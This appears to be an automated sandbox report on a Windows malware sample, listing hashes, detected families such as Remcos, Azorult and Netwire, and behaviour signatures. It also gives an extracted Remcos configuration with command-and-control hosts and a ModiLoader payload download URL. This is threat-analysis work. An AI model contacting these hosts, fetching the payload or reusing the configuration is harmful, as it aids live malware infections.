Analysis
-
max time kernel
486s -
max time network
493s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
20-08-2024 21:32
Errors
General
-
Target
The-MALWARE-Repo
-
Size
298KB
-
MD5
8bfba286e034c4b29e00716800c4fa58
-
SHA1
c779014fda4989d55405df16b3232147a1fe501f
-
SHA256
85e58fbd1bdcf92d7f9ce1acdf26054b79a26e55d4f2ee2a5e1f8f93c0d739fc
-
SHA512
4fffc1efee8c78de7f1284a64d6f822b2207d9515020bda01d58723bb37a9e34ac53ef629157b025f8192803f1487adaeb62a8072ca16f7251ad548b961969d2
-
SSDEEP
6144:QnoYS3uokeOvHS1d1+sNs8wbiWQ99PvZJT3CqbMrhryf65NRPaCieMjAkvCJv1Vc:GoYS3uokeOvHS1d1+sNs8wbiWQ99PvZT
Malware Config
Extracted
remcos
1.7 Pro
Host
nickman12-46565.portmap.io:46565
nickman12-46565.portmap.io:1735
-
audio_folder
audio
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
5
-
copy_file
Userdata.exe
-
copy_folder
Userdata
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
true
-
install_path
%WinDir%\System32
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%WinDir%\System32
-
mouse_option
false
-
mutex
remcos_vcexssuhap
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screens
-
screenshot_path
%AppData%
-
screenshot_time
1
-
startup_value
remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
modiloader
https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Darkcomet
DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
UAC bypass 3 TTPs 7 IoCs
-
Windows security bypass 2 TTPs 1 IoCs
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
ModiLoader First Stage 1 IoCs
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
-
Modifies Windows Firewall 2 TTPs 22 IoCs
-
Sets file to hidden 1 TTPs 13 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 4 TTPs
-
Executes dropped EXE 24 IoCs
-
Modifies file permissions 1 TTPs 62 IoCs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 14 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 35 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 22 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 45 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
NTFS ADS 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 36 IoCs
-
Suspicious use of SetWindowsHookEx 22 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 15 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ff9887bcc40,0x7ff9887bcc4c,0x7ff9887bcc582⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1868,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1852 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2124 /prefetch:32⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3092 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3540,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4496 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4632,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4820 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3552,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4860,i,11350588988411661589,13434704415822302595,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4316 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9887bcc40,0x7ff9887bcc4c,0x7ff9887bcc582⤵
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a27c3cb8,0x7ff9a27c3cc8,0x7ff9a27c3cd82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2532 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5568 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5544 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1932 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4716 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6908 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,17547182442418271132,9112626382429628281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
-
C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\control.exe"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
